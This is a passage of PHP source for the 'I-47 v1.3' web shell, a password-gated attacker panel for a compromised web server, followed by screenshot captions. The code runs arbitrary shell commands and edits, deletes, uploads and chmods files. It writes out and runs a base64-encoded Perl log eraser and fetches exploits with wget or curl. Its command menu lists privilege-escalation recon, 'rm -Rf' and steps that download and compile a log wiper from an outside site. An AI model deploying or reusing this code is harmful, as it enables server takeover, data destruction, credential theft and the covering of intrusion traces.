4211 ?>
4212         </textarea><br />
4213         <input name="save" type="Submit" value="Save Changes" id="spacing" class="but"/>
4214         </form>
4215     <?php
4216                                 } else if (isset($_POST['file']) && isset($_POST['content'])) {
4217                                     if (is_dir($_POST['file'])) {
4218                                         header("location:" . $self . "?dir=" . $_POST['file']);
4219                                     }
4220                                     if (file_exists($_POST['file'])) {
4221                                         $handle = fopen($_POST['file'], "w");
4222                                         fwrite($handle, $_POST['content']);
4223                                         header("Location:$self");
4224                                     } else {
4225                                         echo "<p class='alert'>File Name Specified does not exists!</p>";
4226                                     }
4227                                 } else if (isset($_GET['selfkill'])) {
4228                                     unlink(__FILE__);
4229                                     echo "<br><center><font color=lime size=5>Good Bye......</font></center>";
4230                                 } else if (isset($_POST['executecmd'])) {
4231                                     if ($_POST['mycmd'] == "logeraser") {
4232                                         $erase = gzinflate(base64_decode("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"));
4233                                         if (is_writable(".")) {
4234                                             if ($openp = fopen(getcwd() . "/logseraser.pl", 'w')) {
4235                                                 fwrite($openp, $erase);
4236                                                 fclose($openp);
4237                                                 passthru("perl logseraser.pl linux");
4238                                                 unlink("logseraser.pl");
4239                                                 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
4240                                             }
4241                                         } else {
4242                                             if ($openp = fopen("/tmp/logseraser.pl", 'w')) {
4243                                                 fwrite($openp, $erase) or die("Error");
4244                                                 fclose($openp);
4245                                                 $aidx = passthru("perl logseraser.pl linux");
4246                                                 unlink("logseraser.pl");
4247                                                 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
4248                                             }
4249                                         }
4250                                     } else {
4251                                         $check = shell_exec($_POST['mycmd']);
4252                                         echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
4253                                     }
4254                                 } else if (isset($_POST['changefileperms'])) {
4255                                     if ($_POST['chmode'] != null && is_numeric($_POST['chmode'])) {
4256                                         $actbox = $_POST["actbox3"];
4257                                         foreach ($actbox as $v) {
4258                                             $perms = 0;
4259                                             for ($i = strlen($_POST['chmode']) - 1;$i >= 0;--$i) $perms+= (int)$_POST['chmode'][$i] * pow(8, (strlen($_POST['chmode']) - $i - 1));
4260                                             echo "<center><div align=left style=width:60%;>";
4261                                             if (@chmod($v, $perms)) echo "<blink><font size=3 color=lime>File $v Permissions Changed Successfully</font></blink>";
4262                                             else echo "<blink><font size=3 color=red>Cannot Change $v File Permissions</font></blink>";
4263                                             echo "</div></center>";
4264                                         }
4265                                     }
4266                                 } else if (isset($_POST['choice'])) {
4267                                     if ($_POST['choice'] == "chmod") { ?>
4268        <form method="POST" ><?php
4269                                         $actbox1 = $_POST['actbox'];
4270                                         foreach ($actbox1 as $v) { ?>
4271            <input type="hidden" name="actbox3[]" value="<?php echo $v; ?>">
4272        <?php
4273                                         }
4274 ?>
4275            <table align="center" border="1" style="width:40%;">
4276                <tr>
4277                    <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td> 
4278                </tr>
4279                <tr>
4280                    <td colspan="2" align="center" style="height:60px">
4281            <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changefileperms"/></td>
4282                </tr>
4283            </table>
4284            
4285        </form>  <?php
4286                                     } else if ($_POST['choice'] == "delete") {
4287                                         $actbox = $_POST["actbox"];
4288                                         foreach ($actbox as $v) {
4289                                             if (is_file($v)) {
4290                                                 if (unlink($v)) {
4291                                                     echo "<br><center><font color=lime size=3>File $v Deleted Successfully</font></center>";
4292                                                 } else echo "<br><center><font color=red size=3>Cannot Delete File $v</font></center>";
4293                                             } else if (is_dir($v)) {
4294                                                 rrmdir($v);
4295                                                 $loc = $_SERVER['REQUEST_URI'];
4296                                                 header("Location:$loc");
4297                                                 ob_end_flush();
4298                                             }
4299                                         }
4300                                     } else if ($_POST['choice'] == "compre") {
4301                                         $actbox = $_POST["actbox"];
4302                                         foreach ($actbox as $v) {
4303                                             if (is_file($v)) {
4304                                                 $zip = new ZipArchive();
4305                                                 $filename = basename($v) . '.zip';
4306                                                 if (($zip->open($filename, ZipArchive::CREATE)) !== true) {
4307                                                     echo '<br><font color=red size=3>Error: Unable to create zip file for $v</font>';
4308                                                 } else {
4309                                                     echo "<br><font color=lime size=3>File $v Compressed successfully</font>";
4310                                                 }
4311                                                 $zip->addFile(basename($v));
4312                                                 $zip->close();
4313                                             } else if (is_dir($v)) {
4314                                                 if ($os == "Linux") {
4315                                                     $filename = basename($v);
4316                                                     execmd("tar --create --recursion --file=$filename.tar $v");
4317                                                     echo "<br><font color=lime size=3>File $v Compressed successfully as $v.tar</font>";
4318                                                 }
4319                                             }
4320                                         }
4321                                     } else if ($_POST['choice'] == "uncompre") {
4322                                         $actbox = $_POST["actbox"];
4323                                         foreach ($actbox as $v) {
4324                                             $zip = new ZipArchive;
4325                                             $filename = basename($v);
4326                                             $res = $zip->open($filename);
4327                                             if ($res === TRUE) {
4328                                                 $pieces = explode(".", $filename);
4329                                                 $zip->extractTo($pieces[0]);
4330                                                 $zip->close();
4331                                                 echo "<br><font color=lime size=3>File $v Unzipped successfully</font>";
4332                                             } else {
4333                                                 echo "<br><font color=red size=3>Error: Unable to Unzip file $v</font>";
4334                                             }
4335                                         }
4336                                     }
4337                                 } else if (isset($_POST['execute'])) {
4338                                     $comm = $_POST['execute'];
4339                                     chdir($_POST['executepath']);
4340                                     $check = shell_exec($comm);
4341                                     echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
4342 ?>
4343            <BR><BR><center><form action="<?php $self; ?>" method="post">
4344            <input type="hidden" name="executepath" value="<?php echo $_POST['executepath']; ?>" />
4345            <input type="text" class="box" name="execute">
4346            <input type="submit" value="Execute" class="but"></form></center>
4347            <?php
4348                                 } else if (isset($_POST['Create'])) {
4349 ?>
4350    <form method="post">
4351    
4352    <input type="hidden" name="filecreator" value="<?php echo $_POST['createfile']; ?>">
4353        <textarea name="filecontent" rows="20" cols="100" class="box"></textarea><br />
4354         <input name="createmyfile" type="Submit" value="  Save " id="spacing" class="but"/>
4355   </form>
4356        
4357    <?php
4358                                 } else {
4359                                     $mydir = basename(dirname(__FILE__));
4360                                     $pdir = str_replace($mydir, "", $dir);
4361                                     $pdir = str_replace("/", "", $dir);
4362                                     $files = array();
4363                                     $dirs = array();
4364                                     $odir = opendir($dir);
4365                                     while ($file = readdir($odir)) {
4366                                         if (is_dir($dir . '/' . $file)) {
4367                                             $dirs[] = $file;
4368                                         } else {
4369                                             $files[] = $file;
4370                                         }
4371                                     }
4372                                     $countfiles = count($dirs) + count($files);
4373                                     $dircount = count($dirs);
4374                                     $dircount = $dircount - 2;
4375 ?>
4376    <table style="width:95%;" align="center" cellpadding="3">
4377    <tr style="background-color:#161616;"><td colspan="7" align="center"><font color="red" size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount . ' Dirs And ' . count($files) . ' Files'; ?>)</td>
4378     <tr style="background-color:#161616; height:12px;">
4379         <th style="width:53%;">Name</th>
4380         <th style="width:7%;">Size</th>
4381         <th style="width:9%;">Permissions</th>
4382        <th style="width:12%;">Modification Date</th>
4383         <th style="width:6%;">Rename</th>
4384        <th style="width:7%;">Download</th>
4385        <th style="width:3%;">Action</th>
4386     </tr>
4387    
4388 <?php
4389                                     if (isset($_GET['download'])) {
4390                                         download();
4391                                     }
4392 ?>
4393    <form method="post" id="myform" name="myform">
4394    <?php
4395                                     $dir = getcwd();
4396                                     if (isset($_GET['dir'])) {
4397                                         $dir = $_GET['dir'];
4398                                     }
4399                                     $i = 0;
4400                                     if (is_dir($dir)) {
4401                                         if ($countfiles == 2) echo "<tr><td colspan=5><center><font color=red size=3>No files or directory present or Cannot view files and directory</font></center></td></tr>";
4402                                         foreach ($dirs as $val) {
4403 ?>
4404            <font color="#999999">
4405            <?php if ($val == ".") {
4406 ?><tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'"><td class='info'><a href='<?php echo $self; ?>'><font class=txt>[ . ]</font></a></td><td>CURDIR</td>
4407            <td><?php if (is_writable(getcwd())) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo getcwd(); ?>"><font color="#00CC00"><?php echo getFilePermissions(getcwd()); ?></font></a><?php
4408                                                 } else if (is_readable(getcwd())) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo getcwd(); ?>"><font color="#FF0000"><?php echo getFilePermissions(getcwd()); ?></font></a><?php
4409                                                 } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo getcwd(); ?>"><font color="#FFFFFF"><?php echo getFilePermissions(getcwd()); ?></font><?php
4410                                                 } ?></td>
4411            
4412            <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime(getcwd())); ?></font></td>
4413            <td></td><td></td><td></td></</tr><?php
4414                                             } else if ($val == "..") {
4415                                                 $val = Trail($dir . $directorysperator . $val, $directorysperator); ?>
4416            <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'"><td class='info'><a href='<?php echo $self . "?dir=" . $val; ?>'><font class=txt>[ .. ]</font></a></td><td>UPDIR</td>
4417            <td><?php if (is_writable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($val); ?></font></a><?php
4418                                                 } else if (is_readable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($val); ?></font></a><?php
4419                                                 } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($val); ?></font><?php
4420                                                 } ?></td>
4421            
4422            <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
4423            <td></td><td></td><td></td></</tr><?php continue;
4424                                             }
4425                                         }
4426                                         foreach ($dirs as $val) {
4427                                             $i++;
4428 ?>
4429            <font color="#999999">
4430                
4431            <?php if ($val == "." || $val == "..") continue; ?>
4432            <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'">
4433            <td class='dir'><a href='<?php echo $self ?>?dir=<?php echo $dir . $directorysperator . $val; ?>'>[ <?php echo $val; ?> ]</a></td>
4434            <td class='info'>DIR</td>
4435             <td class='info'><?php if (is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font></a><?php
4436                                             } else if (is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font></a><?php
4437                                             } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font><?php
4438                                             } ?></td>
4439            <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
4440            <td class="info"><a href="<?php echo $self; ?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val; ?>">Rename</a></td>
4441            <td></td>
4442            <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val; ?>"></td>
4443             </tr></font>
4444             <?php
4445                                         }
4446                                         foreach ($files as $val) {
4447                                             $i++;
4448 ?>
4449                    <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'">
4450                    <td class='file'><a href='<?php echo $self ?>?open=<?php echo $dir . $directorysperator . $val; ?>'><?php if (("/" . $val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) {
4451                                                 echo "<font color=red>" . $val . "</font>";
4452                                             } else {
4453                                                 echo $val;
4454                                             } ?></a></td>
4455                   <td class='info'><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val)); ?></td>
4456                    <td class='info'><?php if (is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font></a><?php
4457                                             } else if (is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font></a><?php
4458                                             } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($dir . $directorysperator . $val); ?></font><?php
4459                                             } ?></td>
4460                   <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
4461                    <td class="info"><a href="<?php echo $self; ?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val; ?>">Rename</a></td>
4462                   <td class="info"><a href="<?php echo $self; ?>?download=<?php echo $dir . $directorysperator . $val; ?>">Download</a>
4463                   <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val; ?>"></td>
4464                    </tr>
4465                    <p>
4466             <?php
4467                                         }
4468                                     } else {
4469                                         echo "<p><font color=red size=4>" . $_GET['dir'] . " is <b>NOT</b> a Valid Directory!<br /></font></p>";
4470                                     }
4471                                     echo "</table>
4472 <div align='right' style='width:97%;'><BR><input type='checkbox' name='checkall' onclick='checkedAll();'> <font color=lime size=3>Check All </font> &nbsp;
4473 <select class=sbox name=choice style='width: 100px;'>
4474           <option value=delete>Delete</option>
4475           <option value=chmod>Change mode</option>
4476           if(class_exists('ZipArchive'))
4477           {   <option value=compre>Compress</option>
4478           <option value=uncompre>Uncompress</option> }
4479       </select>
4480   
4481   <input type=submit value=Submit name=checkoption class=but></form></div>";
4482                                 }
4483 ?>
4484 </p>
4485 <table style="width:100%;" border="1">
4486 <tr>
4487 <td align="center">
4488 <form method="post" enctype="multipart/form-data">
4489        
4490        Upload file : <br><input type="file" name="uploadfile" class="box" size="50"><input type="hidden" name="path" value="<?php echo $dir; ?>" />&nbsp;<input type=submit value="Upload" name="u" value="u" class="but" ></form>
4491         <?php
4492                                 if (is_writable($dir)) {
4493                                     echo '<font color=lime>< writable ></font>';
4494                                 } else {
4495                                     echo '< not writable >';
4496                                 }
4497 ?>
4498          <br>
4499        
4500 
4501 
4502 </td>
4503 <td align="center" style="height:105px;">Create File : 
4504 <form method="post">
4505 <input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile"> <input type="submit" value="Create" name="Create" class="but">
4506 </form>
4507 <?php
4508                                 if (is_writable($dir)) {
4509                                     echo '<font color=lime>< writable ></font>';
4510                                 } else {
4511                                     echo '< not writable >';
4512                                 }
4513 ?>
4514 </td>
4515 </tr>
4516 <tr>
4517 <td align="center" style="height:105px;">Execute : <form action="<?php echo $self; ?>" method="post">
4518 <input type="hidden" name="executepath" value="<?php echo $dir; ?>" />
4519 <input type="text" class="box" name="execute"> <input type="submit" value="Execute" class="but"></form></td>
4520 
4521 <td align="center">Create Directory : <form method="post">
4522 <input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder"> 
4523 <input type="submit" value="Create" name="createdir" class="but">
4524 </form><?php
4525                                 if (is_writable($dir)) {
4526                                     echo '<font color=lime>< writable ></font>';
4527                                 } else {
4528                                     echo '< not writable >';
4529                                 }
4530 ?></td></tr>
4531 <tr><td style="height:105px;" align="center">Get Exploit&nbsp;<form method="post" actions="<?php echo $self; ?>">
4532 <input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c"><br><br>
4533 <input type="hidden" name="path" value="<?php echo $dir; ?>">
4534 <select name="functiontype" class="sbox"> 
4535 <option value="wwget">wget</option> 
4536 <option value="wlynx">lynx</option> 
4537 <option value="wfread">fread</option> 
4538 <option value="wfetch">fetch</option> 
4539 <option value="wlinks">links</option> 
4540 <option value="wget">GET</option> 
4541 <option value="wcurl">curl</option> 
4542 </select>
4543 <input type="submit" name="uploadurl" value="  G0  " class="but"></form>
4544 </td>
4545 <td align="center">
4546 <form method="post" action="<?php echo $self; ?>">
4547 Some Commands<br>
4548 <?php if ($os != "Windows") { ?>
4549 <SELECT NAME="mycmd" class="box">
4550      <OPTION VALUE="uname -a">Kernel version
4551      <OPTION VALUE="w">Logged in users
4552      <OPTION VALUE="lastlog">Last to connect
4553     <option value='cat /etc/hosts'>IP Addresses
4554     <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
4555     <OPTION VALUE="logeraser">Log Eraser
4556     <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
4557     <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
4558     <OPTION VALUE="find / -type f -name \"config*\"">find config* files
4559     <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
4560     <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
4561     <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
4562      <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
4563      <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
4564     <?php if (is_dir('/etc/valiases')) { ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php
4565                                     } ?>
4566     <?php if (is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php
4567                                     } ?>
4568      <OPTION VALUE="which wget curl w3m lynx">Downloaders?
4569      <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
4570     <OPTION VALUE="ps aux">Show running proccess
4571     <OPTION VALUE="uptime">Uptime check
4572     <OPTION VALUE="cat /proc/meminfo">Memory check
4573      <OPTION VALUE="netstat -an | grep -i listen">Open ports
4574     <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
4575      <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
4576      <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
4577      <OPTION VALUE="./zap2">WIPELOGS PT3
4578     <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
4579  </SELECT>
4580  <?php
4581                                 } else { ?>
4582  <SELECT NAME="mycmd" class="box">
4583        <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
4584    <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
4585    <OPTION VALUE="systeminfo">System Informations
4586    <OPTION VALUE="net user">User accounts
4587     <OPTION VALUE="netstat -an">Open ports
4588    <OPTION VALUE="getmac">Get Mac Address
4589    <OPTION VALUE="net start">Show running services
4590    <OPTION VALUE="net view">Show computers
4591    <OPTION VALUE="arp -a">ARP Table
4592    <OPTION VALUE="tasklist">Show Process
4593    <OPTION VALUE="ipconfig/all">IP Configuration
4594    
4595  </SELECT>
4596  <?php
4597                                 } ?>
4598 <input type="submit" value="Execute" class="but" name="executecmd">
4599 </form>
4600 </td>
4601 </tr></table><br>
4602    
4603 </td>
4604 </tr>
4605 </table>
4606 <?php
4607                                 //logout
4608                                 if (isset($_GET['logout'])) {
4609                                     setcookie("hacked", time() - 60 * 60);
4610                                     header("Location:$self");
4611                                     ob_end_flush();
4612                                 }
4613 ?>
4614 
4615 
4616 <hr>
4617 <div align="center">
4618 <font size="6" face="Times New Roman, Times, serif" color="#00CC00">I-47 v1.3 <br>
4619 --==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">&#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342;</font></a></div>
4620 <?php
4621                             }
4622                         }
4623                         if (isset($_POST['uname']) && isset($_POST['passwd'])) {
4624                             if ($_POST['uname'] == $user && $_POST['passwd'] == $pass) {
4625                                 setcookie("hacked", md5($pass));
4626                                 $selfenter = $_SERVER["PHP_SELF"];
4627                                 header("Location:$selfenter");
4628                             }
4629                         }
4630                         if ((!isset($_COOKIE['hacked']) || $_COOKIE['hacked'] != md5($pass))) {
4631 ?>
4632    <center>
4633    <form method="POST">
4634    <div style="background-color:#006600; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
4635        <table cellpadding="9" cellspacing="4">
4636            <tr>
4637                <td align="center" colspan="2"><blink><font size="7"><b>I-47 v1.3 </b></font></blink></td>
4638            </tr>
4639            <tr>
4640                <td align="right"><b>User Name : </b></td>
4641                <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;"  value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
4642            </tr>
4643            <tr>
4644                <td align="right"><b>Password : </b></td>
4645                <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;"  value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
4646            </tr>
4647            <tr>
4648                <td align="center" colspan="2"><input type="submit" class="but" value="     Enter     "></td>
4649            </tr>
4650            <tr>
4651                <td colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
4652            </tr>
4653        </table>
4654    </div>
4655    
4656    </form>
4657    </center>
4658 <br>
4659 </body>
4660 </html>
4661 <?php
4662                         }
4663 ?>

I-47 Shell Screenshot

i-47 shell screenshot

i-47 shell screenshot